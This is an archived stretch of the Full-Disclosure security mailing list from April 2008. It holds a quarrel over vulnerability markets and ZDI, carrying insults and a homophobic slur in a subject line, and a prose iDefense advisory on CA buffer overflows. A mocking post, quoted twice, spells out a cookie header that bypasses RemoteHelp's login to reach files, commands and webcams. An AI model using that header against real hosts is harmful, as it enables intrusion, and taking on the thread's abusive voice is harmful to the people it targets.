References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com>	<27886.1207189079@turing-police.cc.vt.edu>	<fec013240804021927h432e01bfyb6add150141cda87@mail.gmail.com>	<030b01c89543$0b481540$6401a8c0@maryl>	<C4B44D4D4D0053622A781365@Macintosh.local>	<82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com>	<6158bb410804030645w4057c055o503ff0302f87e1f8@mail.gmail.com>	<004e01c89593$4cec60f0$336b880a@softpro.corp>	<4b6ee9310804031438vde21ff8od59b6c66325f5d05@mail.gmail.com>	<6158bb410804040728wb271dfey16b7fd58d19dfb54@mail.gmail.com>
	<fec013240804040830i2fa6a097hc463687c6ef0612e@mail.gmail.com>
Message-ID: <47F64DAA.9030505@brvenik.com>

We are now close to this space being full circle. The next step is that 
the researchers will offer the vendor a chance to compete for the 
information on the vuln IP market and as a result winning vendors can 
choose to keep it to themselves...

Yep, Microsoft has won and we will soon be back to non-disclosure all 
around.

Micheal Cottingham wrote:
> I too have participated in ZDI as a researcher. It is a very good
> program, and both the company and the researcher get what they want
> out of the process. The company gets the time to fix the vulnerability
> before everybody else finds out, and the researcher gets the
> recognition (and some money) for their work. It is a win-win
> situation.
> 
> On Fri, Apr 4, 2008 at 10:28 AM, Ureleet <ureleet at gmail.com> wrote:
>> ive dealt a bit with tipping point and their zdi.  how about you learn how
>> it works first, the come back and criticize it?  you obviously dont
>> understand the contest at cansecwest, or how zdi plays into it.  i was
>> there, it was a good conf.
>>
>> but you need to learn how it works before you go ranting about it....
>> again...
>>
>>



From brianli2001 at yahoo.co.uk  Fri Apr  4 17:54:31 2008
From: brianli2001 at yahoo.co.uk (Brian Livingstone)
Date: Fri, 4 Apr 2008 16:54:31 +0000 (GMT)
Subject: [Full-disclosure] ZDI-08-018: Apple QuickTime Run Length
	Encoding Heap Overflow Vulnerability
Message-ID: <848549.85068.qm@web23306.mail.ird.yahoo.com>

Don't you have a job to go to????

----- Original Message ----
From: n3td3v <xploitable at gmail.com>
To: Ureleet <ureleet at gmail.com>; zdi-disclosures at 3com.com; full-disclosure at lists.grok.org.uk; bugtraq at securityfocus.com; n3td3v <n3td3v at googlegroups.com>
Sent: Friday, 4 April, 2008 5:37:07 PM
Subject: Re: [Full-disclosure] ZDI-08-018: Apple QuickTime Run Length Encoding Heap Overflow Vulnerability

On Fri, Apr 4, 2008 at 3:33 PM, Ureleet <ureleet at gmail.com> wrote:
> dear zdi,
>
> please instruct n3td3v on your process.  oh sorry you already have in every
> email alert that you send!

I never once mentioned anything about the zero day initiative? Can you
find where I mentioned about the zero day initiative.
They have nothing to do with this, they don't spam the mailing lists
to make money. All i've seen them do is disclose vulnerabilities,
which is fair play e-mail. I'm a big fan of the zero day initiative, I
have no gripes with them whatsoever.

Regards,

n3td3v

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


      ___________________________________________________________ 
Yahoo! For Good helps you make a difference  

http://uk.promotions.yahoo.com/forgood/



From techie.micheal at gmail.com  Fri Apr  4 18:23:19 2008
From: techie.micheal at gmail.com (Micheal Cottingham)
Date: Fri, 4 Apr 2008 13:23:19 -0400
Subject: [Full-disclosure] Fwd: Let's outlaw mass
	securityconferencespamming its f****** gay
In-Reply-To: <4b6ee9310804040907p77b84f1aq72a9d1655273466c@mail.gmail.com>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com>
	<fec013240804021927h432e01bfyb6add150141cda87@mail.gmail.com>
	<030b01c89543$0b481540$6401a8c0@maryl>
	<C4B44D4D4D0053622A781365@Macintosh.local>
	<82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com>
	<6158bb410804030645w4057c055o503ff0302f87e1f8@mail.gmail.com>
	<004e01c89593$4cec60f0$336b880a@softpro.corp>
	<4b6ee9310804031438vde21ff8od59b6c66325f5d05@mail.gmail.com>
	<6158bb410804040728wb271dfey16b7fd58d19dfb54@mail.gmail.com>
	<4b6ee9310804040907p77b84f1aq72a9d1655273466c@mail.gmail.com>
Message-ID: <fec013240804041023p65b57b5amb3eef34dabc85fb9@mail.gmail.com>

Robert Lemos even http://www.securityfocus.com/news/11510 talked about
vulnerability pricing when Pwn2Own was on, and even Pwn2Own cash
reward might not be enough money, compared to what a vulnerability
*should* be worth, and taking into consideration how much profit
CanSecWest make overall from people attending the conference.
[/quote]

Pwn2Own was sponsored by ZDI/TippingPoint ...

On Fri, Apr 4, 2008 at 12:07 PM, n3td3v <xploitable at gmail.com> wrote:
> On Fri, Apr 4, 2008 at 3:28 PM, Ureleet <ureleet at gmail.com> wrote:
>  > ive dealt a bit with tipping point and their zdi.  how about you learn how
>  > it works first, the come back and criticize it?
>
>  I never once mentioned anything about the zero day initiative? Can you
>  find where I mentioned about the zero day initiative.
>  They have nothing to do with this, they don't spam the mailing lists
>  to make money. All i've seen them do is disclose vulnerabilities,
>  which is fair play e-mail. I'm a big fan of the zero day initiative, I
>  have no gripes with them whatsoever.
>
>  Regards,
>
>
>
>  n3td3v
>
>  _______________________________________________
>  Full-Disclosure - We believe in it.
>  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>  Hosted and sponsored by Secunia - http://secunia.com/
>



From labs-no-reply at idefense.com  Fri Apr  4 19:40:26 2008
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Fri, 04 Apr 2008 14:40:26 -0400
Subject: [Full-disclosure] iDefense Security Advisory 04.03.08: Computer
 Associates Alert Notification Service Multiple RPC Buffer Overflow
 Vulnerabilities
Message-ID: <47F6761A.8030806@idefense.com>

iDefense Security Advisory 04.03.08
http://labs.idefense.com/intelligence/vulnerabilities/
Apr 03, 2008

I. BACKGROUND

Computer Associates Alert Notification Server is used by several CA
products, including eTrust Integrated Threat Management, to provide
notifications to console users.

II. DESCRIPTION

Remote exploitation of multiple buffer overflow vulnerabilities in
Computer Associates International Inc.'s Alert Notification Service may
allow an authenticated attacker to execute arbitrary code with SYSTEM
privileges.

The Alert Service is a component of multiple Computer Associates'
products. It is used to provide status updates and notifications
regarding various system events. It implements an RPC interface with
GUID 3d742890-397c-11cf-9bf1-00805f88cb72.

Multiple buffer overflows exist in the handlers for various opcodes. In
each case, unsafe library functions are used to copy attacker supplied
data into fixed size stack buffers. By making specially crafted
requests, attackers are able to cause an exploitable buffer overflow.

III. ANALYSIS

Exploitation of these vulnerabilities allows an attacker to execute
arbitrary code with SYSTEM privileges. In order to exploit these
vulnerabilities, it is necessary for an attacker to have valid domain
credentials.

IV. DETECTION

iDefense confirmed the existence of these vulnerabilities with Computer
Associates' Threat Manager for the Enterprise version 8.1. Other
products that contain the Alert Notification Service are suspected to
be vulnerable as well.

V. WORKAROUND

iDefense is currently unaware of any effective workaround for these
issues.

VI. VENDOR RESPONSE

Computer Associates has addressed these issues by providing updates.
More information is available in their advisory at the following URL.

https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=173103

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2007-4620 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

08/24/2007  Initial vendor notification
08/24/2007  Initial vendor response
04/03/2008  Coordinated public disclosure

IX. CREDIT

The discoverer of these vulnerabilities wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright ? 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice at idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.



From ureleet at gmail.com  Fri Apr  4 21:34:47 2008
From: ureleet at gmail.com (Ureleet)
Date: Fri, 4 Apr 2008 16:34:47 -0400
Subject: [Full-disclosure] Fwd: Let's outlaw mass
	securityconferencespamming its f****** gay
In-Reply-To: <4b6ee9310804040907p77b84f1aq72a9d1655273466c@mail.gmail.com>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com>
	<fec013240804021927h432e01bfyb6add150141cda87@mail.gmail.com>
	<030b01c89543$0b481540$6401a8c0@maryl>
	<C4B44D4D4D0053622A781365@Macintosh.local>
	<82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com>
	<6158bb410804030645w4057c055o503ff0302f87e1f8@mail.gmail.com>
	<004e01c89593$4cec60f0$336b880a@softpro.corp>
	<4b6ee9310804031438vde21ff8od59b6c66325f5d05@mail.gmail.com>
	<6158bb410804040728wb271dfey16b7fd58d19dfb54@mail.gmail.com>
	<4b6ee9310804040907p77b84f1aq72a9d1655273466c@mail.gmail.com>
Message-ID: <6158bb410804041334s1164c9e5v76afa5b62e44f66d@mail.gmail.com>

see:
> - Come to our conference - profit... buy our ticket, get a macbook prize.

> - Hacking challenge prize - profit... they give you $5000 and sell it
> to the vendor for a lot more.

ZDI provides the money for this.  and they don't sell it back to vendor

> - Train to use our software -profit... over priced training for
> software... not interested.

dont' get angry at remote-exploit because they are making money from their
work .  how much money do you make from posting to fd?

> On the issue of how much a vulnerability is worth, the prices are not
> regulated, we need regulation into how much a vulnerability costs,
> because the prices right now are wild. We need to take vulnerability
> pricing off the blackmarket and onto a legitimate central website for
> selling vulnerabilities, or cash rewards for disclosing a
> vulnerability to a particular company or organisation.

wabisabilabi?  zdi...  etc.

> Can someone post to full-disclosure a price list of what they think a
> bufferoverflow should be worth etc, and we can vote if we agree.

feel free to take that as a todo item.  however, i would think it would
depend on the bo.

> We can't dress up cash prizes/contests as something else as well, if a
> website is offering a $5,000 reward for a vulnerability, we need to
> know if we're being ripped off with the cash reward and how much can
> be potentially made after its sold on.

zdi doesn't sell their exploits afaik.

> Robert Lemos even http://www.securityfocus.com/news/11510 talked about
> vulnerability pricing when Pwn2Own was on, and even Pwn2Own cash
> reward might not be enough money, compared to what a vulnerability
> *should* be worth, and taking into consideration how much profit
> CanSecWest make overall from people attending the conference.

the pwn2own cash is supplied by zdi.  that's what you arent' realizing.

> So you take into consideration how much a vulnerability should be
> worth, then the added worth because its a security conference of how
> much should be added on to counter the profit being made by the event.

you already said this. twice.

> However, to round off, we can't allow the mailing lists to turn into a
> vulnerability market place, full-disclosure should be for free stuff,
> and other websites and mailing lists can be setup for *money making
> schemes and auctions*.

there are.  however how are the people going to know about the websites if
you don't allow people to 'spam' lists with this sort of thing, mr
unofficial-fd moderator?

> We shouldn't allow the money makers directly to market X... if a link
> is put on Full-Disclosure by a member of the public on the fly then
> thats ok, but I think its cheeky for the particular conference,
> contest runner or software trainer to be on the list themselves
> spamming everyone, for a profiteering agenda.

that's why its called free enterprise, it's an unmoderated list.  feel free
to unsubscribe if you dont like it much..

> You mention cross-posting, thats not the issue here, its the people
> making the money posting to make the money that offends me so much.

we know, its the third time youve said it in one email.

> And not even the lonely hacker offends me who posts i've got a
> vulnerability for sale for X, I don't mind that on Full-Disclosure,
> but what I do mind is if its a company or organisation doing it that
> is directly the ones making the money via vulnerability for sale,
> prize contest, security conference or train to use our software!!!,
> thats the height of spam I just think is utterly wrong and unethical
> on any scale of acceptability.

again, free market, and you are directly talking about zdi.

> If a lonley hacker who works in a supermarket has a vulnerabilty to
> sell i'm all for it being post on full-disclosure, but not the big
> money conferences, prize hacking contests and software training guys.

fourth time.

> I come under the bracket as supermarket worker with nothing much going
> for me in life, so I should be allowed to sell a vulnerability on
> what's ment to be a mailing list for non-profit disclosure.

you work at a supermarket?  so you know about the under cash drawer switch
that pops open the drawer exploit?


> You will find it easy to shout me down and say n3td3v's an idiot, but
> wait to the vulnerability market really takes off and the prices of
> vulnerabilities are properly defined and regulated, you're going to
> see a huge increase in commercial spam on the mailing lists, like the
> full-disclosure mailing list. so we've got to define what's fair play
> e-mail and what's a company or organisation blatantly profiteering
> with X method of extracting money out of people and using skilled
> hackers to make money, and to promote a security conference, training
> etc.

again, unmoderated list.  the door is over there.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080404/df727558/attachment.html 

From ureleet at gmail.com  Fri Apr  4 21:35:11 2008
From: ureleet at gmail.com (Ureleet)
Date: Fri, 4 Apr 2008 16:35:11 -0400
Subject: [Full-disclosure] Fwd: Let's outlaw mass
	securityconferencespamming its f****** gay
In-Reply-To: <fec013240804041023p65b57b5amb3eef34dabc85fb9@mail.gmail.com>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com>
	<030b01c89543$0b481540$6401a8c0@maryl>
	<C4B44D4D4D0053622A781365@Macintosh.local>
	<82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com>
	<6158bb410804030645w4057c055o503ff0302f87e1f8@mail.gmail.com>
	<004e01c89593$4cec60f0$336b880a@softpro.corp>
	<4b6ee9310804031438vde21ff8od59b6c66325f5d05@mail.gmail.com>
	<6158bb410804040728wb271dfey16b7fd58d19dfb54@mail.gmail.com>
	<4b6ee9310804040907p77b84f1aq72a9d1655273466c@mail.gmail.com>
	<fec013240804041023p65b57b5amb3eef34dabc85fb9@mail.gmail.com>
Message-ID: <6158bb410804041335q727dc069lb578cb43691671ef@mail.gmail.com>

i was hoping he'd realize that

On Fri, Apr 4, 2008 at 1:23 PM, Micheal Cottingham <techie.micheal at gmail.com>
wrote:

> Robert Lemos even http://www.securityfocus.com/news/11510 talked about
> vulnerability pricing when Pwn2Own was on, and even Pwn2Own cash
> reward might not be enough money, compared to what a vulnerability
> *should* be worth, and taking into consideration how much profit
> CanSecWest make overall from people attending the conference.
> [/quote]
>
> Pwn2Own was sponsored by ZDI/TippingPoint ...
>
> On Fri, Apr 4, 2008 at 12:07 PM, n3td3v <xploitable at gmail.com> wrote:
> > On Fri, Apr 4, 2008 at 3:28 PM, Ureleet <ureleet at gmail.com> wrote:
> >  > ive dealt a bit with tipping point and their zdi.  how about you
> learn how
> >  > it works first, the come back and criticize it?
> >
> >  I never once mentioned anything about the zero day initiative? Can you
> >  find where I mentioned about the zero day initiative.
> >  They have nothing to do with this, they don't spam the mailing lists
> >  to make money. All i've seen them do is disclose vulnerabilities,
> >  which is fair play e-mail. I'm a big fan of the zero day initiative, I
> >  have no gripes with them whatsoever.
> >
> >  Regards,
> >
> >
> >
> >  n3td3v
> >
> >  _______________________________________________
> >  Full-Disclosure - We believe in it.
> >  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >  Hosted and sponsored by Secunia - http://secunia.com/
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080404/ecc13f4c/attachment.html 

From ureleet at gmail.com  Fri Apr  4 21:36:05 2008
From: ureleet at gmail.com (Ureleet)
Date: Fri, 4 Apr 2008 16:36:05 -0400
Subject: [Full-disclosure] Fwd: Let's outlaw mass
	securityconferencespamming its f****** gay
In-Reply-To: <47F64DAA.9030505@brvenik.com>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com>
	<030b01c89543$0b481540$6401a8c0@maryl>
	<C4B44D4D4D0053622A781365@Macintosh.local>
	<82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com>
	<6158bb410804030645w4057c055o503ff0302f87e1f8@mail.gmail.com>
	<004e01c89593$4cec60f0$336b880a@softpro.corp>
	<4b6ee9310804031438vde21ff8od59b6c66325f5d05@mail.gmail.com>
	<6158bb410804040728wb271dfey16b7fd58d19dfb54@mail.gmail.com>
	<fec013240804040830i2fa6a097hc463687c6ef0612e@mail.gmail.com>
	<47F64DAA.9030505@brvenik.com>
Message-ID: <6158bb410804041336p2fc9e424n8aa9a54d946a8859@mail.gmail.com>

arent we already there?

On Fri, Apr 4, 2008 at 11:47 AM, Jason <security at brvenik.com> wrote:

> We are now close to this space being full circle. The next step is that
> the researchers will offer the vendor a chance to compete for the
> information on the vuln IP market and as a result winning vendors can
> choose to keep it to themselves...
>
> Yep, Microsoft has won and we will soon be back to non-disclosure all
> around.
>
> Micheal Cottingham wrote:
> > I too have participated in ZDI as a researcher. It is a very good
> > program, and both the company and the researcher get what they want
> > out of the process. The company gets the time to fix the vulnerability
> > before everybody else finds out, and the researcher gets the
> > recognition (and some money) for their work. It is a win-win
> > situation.
> >
> > On Fri, Apr 4, 2008 at 10:28 AM, Ureleet <ureleet at gmail.com> wrote:
> >> ive dealt a bit with tipping point and their zdi.  how about you learn
> how
> >> it works first, the come back and criticize it?  you obviously dont
> >> understand the contest at cansecwest, or how zdi plays into it.  i was
> >> there, it was a good conf.
> >>
> >> but you need to learn how it works before you go ranting about it....
> >> again...
> >>
> >>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080404/57d8a5d3/attachment.html 

From ureleet at gmail.com  Fri Apr  4 21:37:06 2008
From: ureleet at gmail.com (Ureleet)
Date: Fri, 4 Apr 2008 16:37:06 -0400
Subject: [Full-disclosure] ZDI-08-018: Apple QuickTime Run Length
	Encoding Heap Overflow Vulnerability
In-Reply-To: <4b6ee9310804040937h7d3f81cpb7a1e13312ca72d1@mail.gmail.com>
References: <OFCBB3C2B1.C08F0061-ON88257420.00774D58-86257420.00785915@3com.com>
	<6158bb410804040733t5907006fg75a6c32d80cff145@mail.gmail.com>
	<4b6ee9310804040937h7d3f81cpb7a1e13312ca72d1@mail.gmail.com>
Message-ID: <6158bb410804041337m563d8072p87752f5736eb63fb@mail.gmail.com>

see my other email, i'm not cross threading like you.

On Fri, Apr 4, 2008 at 12:37 PM, n3td3v <xploitable at gmail.com> wrote:

> On Fri, Apr 4, 2008 at 3:33 PM, Ureleet <ureleet at gmail.com> wrote:
> > dear zdi,
> >
> > please instruct n3td3v on your process.  oh sorry you already have in
> every
> > email alert that you send!
>
> I never once mentioned anything about the zero day initiative? Can you
> find where I mentioned about the zero day initiative.
> They have nothing to do with this, they don't spam the mailing lists
> to make money. All i've seen them do is disclose vulnerabilities,
> which is fair play e-mail. I'm a big fan of the zero day initiative, I
> have no gripes with them whatsoever.
>
> Regards,
>
> n3td3v
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080404/27f34959/attachment.html 

From ureleet at gmail.com  Fri Apr  4 21:37:56 2008
From: ureleet at gmail.com (Ureleet)
Date: Fri, 4 Apr 2008 16:37:56 -0400
Subject: [Full-disclosure] n3td3v agenda & Solid Information Security
	State Release 0012
In-Reply-To: <805292.91098.qm@web23315.mail.ird.yahoo.com>
References: <805292.91098.qm@web23315.mail.ird.yahoo.com>
Message-ID: <6158bb410804041337j5fbb8c2cqf34c5f9af1e72478@mail.gmail.com>

r u serious?

On Fri, Apr 4, 2008 at 10:48 AM, Micheal Turner <wh1t3h4t3 at yahoo.co.uk>
wrote:

>      n3td3v agenda & Cyber Security group
>      ====================================
>
>  Solid Information Security State Release #0012a
>
> MARKING: RESTRICTIONS APPLY.
> FAO: WORLD LEADERS
>
> == Introduction ==
> Serious high-risk ultra critical vulnerability has
> been identified in Remote Help application that maybe
> used by CIA, NSA and FBI employees when helping
> colleagues on anti-terror campaigns.RemoteHelp is a
> minimal http server that allows to view and control a
> remote pc running a 32-bits version of Microsoft
> Windows.
> current version is 0.0.6 and runs stand-alone or
> installs as a service.
>
> == URL ==
> http://sourceforge.net/projects/remotehelp/
>
> == HISTORY ==
> After n3td3v agenda emailed the NSA, SANS and all
> information security groups and was found not to be
> taken seriously. High risk proof of concept exploit
> code has been authored for severe vulnerability in
> Remote Help application which maybe used by any number
> of Yahoo!, Google!, Ebay! or NSA employees. This
> vulnerability gives rise to serious national
> infrastructure risk and should not be under estimated!
>
> == Proof of Concept ==
> I found a vulnerability in the pages.c file which
> generates the login page dialog and authenticates a
> user after it checks if your "user" and "pass"
> parameter match the defaults
> (user/default) it does this:
>
>   strncpy(cookie,"user=default; path=/; expires=Sun,
> 11-May-2030 22:11:40 GMT",1024);
>
> for a valid login and for an invalid login it sets an
> expired cookie like so;
>   strncpy(cookie,"user=default; path=/; expires=Sun,
> 11-May-1970 22:11:40 GMT",1024);
>
> all you have to do is add "Cookie: user=default;
> path=/; expires=Sun, 11-May-2030 22:11:40 GMT" to your
> HTTP request and you can bypass
> authentication to the Remote Help server and access
> the filesystem/exec commands/view the webcam of the
> hosts running it.
>
> == Credit ==
>
> n3td3v & documentation help by Michael Turner.
>
> "Never trust your employees."
>
>
>      ___________________________________________________________
> Yahoo! For Good helps you make a difference
>
> http://uk.promotions.yahoo.com/forgood/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080404/2c57e1d0/attachment.html 

From razishaban at gmail.com  Fri Apr  4 22:41:26 2008
From: razishaban at gmail.com (Razi Shaban)
Date: Sat, 5 Apr 2008 00:41:26 +0300
Subject: [Full-disclosure] n3td3v agenda & Solid Information Security
	State Release 0012
In-Reply-To: <6158bb410804041337j5fbb8c2cqf34c5f9af1e72478@mail.gmail.com>
References: <805292.91098.qm@web23315.mail.ird.yahoo.com>
	<6158bb410804041337j5fbb8c2cqf34c5f9af1e72478@mail.gmail.com>
Message-ID: <2d792fb20804041441i31259485xefcc8ec761b3761e@mail.gmail.com>

It's called "a joke."

--
Razi

On 4/4/08, Ureleet <ureleet at gmail.com> wrote:
> r u serious?
>
>
> On Fri, Apr 4, 2008 at 10:48 AM, Micheal Turner <wh1t3h4t3 at yahoo.co.uk>
> wrote:
> >      n3td3v agenda & Cyber Security group
> >      ====================================
> >
> >  Solid Information Security State Release #0012a
> >
> > MARKING: RESTRICTIONS APPLY.
> > FAO: WORLD LEADERS
> >
> > == Introduction ==
> > Serious high-risk ultra critical vulnerability has
> > been identified in Remote Help application that maybe
> > used by CIA, NSA and FBI employees when helping
> > colleagues on anti-terror campaigns.RemoteHelp is a
> > minimal http server that allows to view and control a
> > remote pc running a 32-bits version of Microsoft
> > Windows.
> > current version is 0.0.6 and runs stand-alone or
> > installs as a service.
> >
> > == URL ==
> > http://sourceforge.net/projects/remotehelp/
> >
> > == HISTORY ==
> > After n3td3v agenda emailed the NSA, SANS and all
> > information security groups and was found not to be
> > taken seriously. High risk proof of concept exploit
> > code has been authored for severe vulnerability in
> > Remote Help application which maybe used by any number
> > of Yahoo!, Google!, Ebay! or NSA employees. This
> > vulnerability gives rise to serious national
> > infrastructure risk and should not be under estimated!
> >
> > == Proof of Concept ==
> > I found a vulnerability in the pages.c file which
> > generates the login page dialog and authenticates a
> > user after it checks if your "user" and "pass"
> > parameter match the defaults
> > (user/default) it does this:
> >
> >   strncpy(cookie,"user=default; path=/; expires=Sun,
> > 11-May-2030 22:11:40 GMT",1024);
> >
> > for a valid login and for an invalid login it sets an
> > expired cookie like so;
> >   strncpy(cookie,"user=default; path=/; expires=Sun,
> > 11-May-1970 22:11:40 GMT",1024);
> >
> > all you have to do is add "Cookie: user=default;
> > path=/; expires=Sun, 11-May-2030 22:11:40 GMT" to your
> > HTTP request and you can bypass
> > authentication to the Remote Help server and access
> > the filesystem/exec commands/view the webcam of the
> > hosts running it.
> >
> > == Credit ==
> >
> > n3td3v & documentation help by Michael Turner.
> >
> > "Never trust your employees."
> >
> >
> >
> ___________________________________________________________
> > Yahoo! For Good helps you make a difference
> >
> > http://uk.promotions.yahoo.com/forgood/
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
> _______________________________________________
>  Full-Disclosure - We believe in it.
>  Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
>  Hosted and sponsored by Secunia - http://secunia.com/
>



From xploitable at gmail.com  Fri Apr  4 23:11:01 2008
From: xploitable at gmail.com (n3td3v)
Date: Fri, 4 Apr 2008 23:11:01 +0100
Subject: [Full-disclosure] Fwd: Let's outlaw mass
	securityconferencespamming its f****** gay
In-Reply-To: <6158bb410804041334s1164c9e5v76afa5b62e44f66d@mail.gmail.com>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com>
	<030b01c89543$0b481540$6401a8c0@maryl>
	<C4B44D4D4D0053622A781365@Macintosh.local>
	<82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com>
	<6158bb410804030645w4057c055o503ff0302f87e1f8@mail.gmail.com>
	<004e01c89593$4cec60f0$336b880a@softpro.corp>
	<4b6ee9310804031438vde21ff8od59b6c66325f5d05@mail.gmail.com>
	<6158bb410804040728wb271dfey16b7fd58d19dfb54@mail.gmail.com>
	<4b6ee9310804040907p77b84f1aq72a9d1655273466c@mail.gmail.com>
	<6158bb410804041334s1164c9e5v76afa5b62e44f66d@mail.gmail.com>
Message-ID: <4b6ee9310804041511i32365f33g3dcdc9ef34a02e5c@mail.gmail.com>

On Fri, Apr 4, 2008 at 9:34 PM, Ureleet <ureleet at gmail.com> wrote:
> see:
>
> > - Come to our conference - profit... buy our ticket, get a macbook prize.
>
> > - Hacking challenge prize - profit... they give you $5000 and sell it
> > to the vendor for a lot more.
>
> ZDI provides the money for this.  and they don't sell it back to vendor
>
>
> > - Train to use our software -profit... over priced training for
> > software... not interested.
>
> dont' get angry at remote-exploit because they are making money from their
> work .  how much money do you make from posting to fd?
>
>
> > On the issue of how much a vulnerability is worth, the prices are not
> > regulated, we need regulation into how much a vulnerability costs,
> > because the prices right now are wild. We need to take vulnerability
> > pricing off the blackmarket and onto a legitimate central website for
> > selling vulnerabilities, or cash rewards for disclosing a
> > vulnerability to a particular company or organisation.
>
> wabisabilabi?  zdi...  etc.
>
> > Can someone post to full-disclosure a price list of what they think a
> > bufferoverflow should be worth etc, and we can vote if we agree.
>
> feel free to take that as a todo item.  however, i would think it would
> depend on the bo.
>
> > We can't dress up cash prizes/contests as something else as well, if a
> > website is offering a $5,000 reward for a vulnerability, we need to
> > know if we're being ripped off with the cash reward and how much can
> > be potentially made after its sold on.
>
> zdi doesn't sell their exploits afaik.
>
>
> > Robert Lemos even http://www.securityfocus.com/news/11510 talked about
> > vulnerability pricing when Pwn2Own was on, and even Pwn2Own cash
> > reward might not be enough money, compared to what a vulnerability
> > *should* be worth, and taking into consideration how much profit
> > CanSecWest make overall from people attending the conference.
>
> the pwn2own cash is supplied by zdi.  that's what you arent' realizing.
>
>
> > So you take into consideration how much a vulnerability should be
> > worth, then the added worth because its a security conference of how
> > much should be added on to counter the profit being made by the event.
>
> you already said this. twice.
>
>
> > However, to round off, we can't allow the mailing lists to turn into a
> > vulnerability market place, full-disclosure should be for free stuff,
> > and other websites and mailing lists can be setup for *money making
> > schemes and auctions*.
>
> there are.  however how are the people going to know about the websites if
> you don't allow people to 'spam' lists with this sort of thing, mr
> unofficial-fd moderator?
>
>
> > We shouldn't allow the money makers directly to market X... if a link
> > is put on Full-Disclosure by a member of the public on the fly then
> > thats ok, but I think its cheeky for the particular conference,
> > contest runner or software trainer to be on the list themselves
> > spamming everyone, for a profiteering agenda.
>
> that's why its called free enterprise, it's an unmoderated list.  feel free
> to unsubscribe if you dont like it much..
>
>
> > You mention cross-posting, thats not the issue here, its the people
> > making the money posting to make the money that offends me so much.
>
> we know, its the third time youve said it in one email.
>
>
> > And not even the lonely hacker offends me who posts i've got a
> > vulnerability for sale for X, I don't mind that on Full-Disclosure,
> > but what I do mind is if its a company or organisation doing it that
> > is directly the ones making the money via vulnerability for sale,
> > prize contest, security conference or train to use our software!!!,
> > thats the height of spam I just think is utterly wrong and unethical
> > on any scale of acceptability.
>
> again, free market, and you are directly talking about zdi.
>
>
> > If a lonley hacker who works in a supermarket has a vulnerabilty to
> > sell i'm all for it being post on full-disclosure, but not the big
> > money conferences, prize hacking contests and software training guys.
>
> fourth time.
>
>
> > I come under the bracket as supermarket worker with nothing much going
> > for me in life, so I should be allowed to sell a vulnerability on
> > what's ment to be a mailing list for non-profit disclosure.
>
> you work at a supermarket?  so you know about the under cash drawer switch
> that pops open the drawer exploit?
>
>
>
> > You will find it easy to shout me down and say n3td3v's an idiot, but
> > wait to the vulnerability market really takes off and the prices of
> > vulnerabilities are properly defined and regulated, you're going to
> > see a huge increase in commercial spam on the mailing lists, like the
> > full-disclosure mailing list. so we've got to define what's fair play
> > e-mail and what's a company or organisation blatantly profiteering
> > with X method of extracting money out of people and using skilled
> > hackers to make money, and to promote a security conference, training
> > etc.
>
> again, unmoderated list.  the door is over there.

* i * * never * mentioned * ZDI * you * complete * jerk * off *

* read * * the * * e-mail * properly * and * you * will * understand *
what * I * don't * like *

Overview:

FIRST

I said let's have a debate about how much a vulnerability is worth per
vulnerability type, so everyone knows if we're being ripped off by joe
jobs and to stop any blackmarkets, prices needs to be defined and
regulated, so everyone knows where they stand in the security
community as far as prices are concerned.

^^^^You bypassed this completely.

SECOND

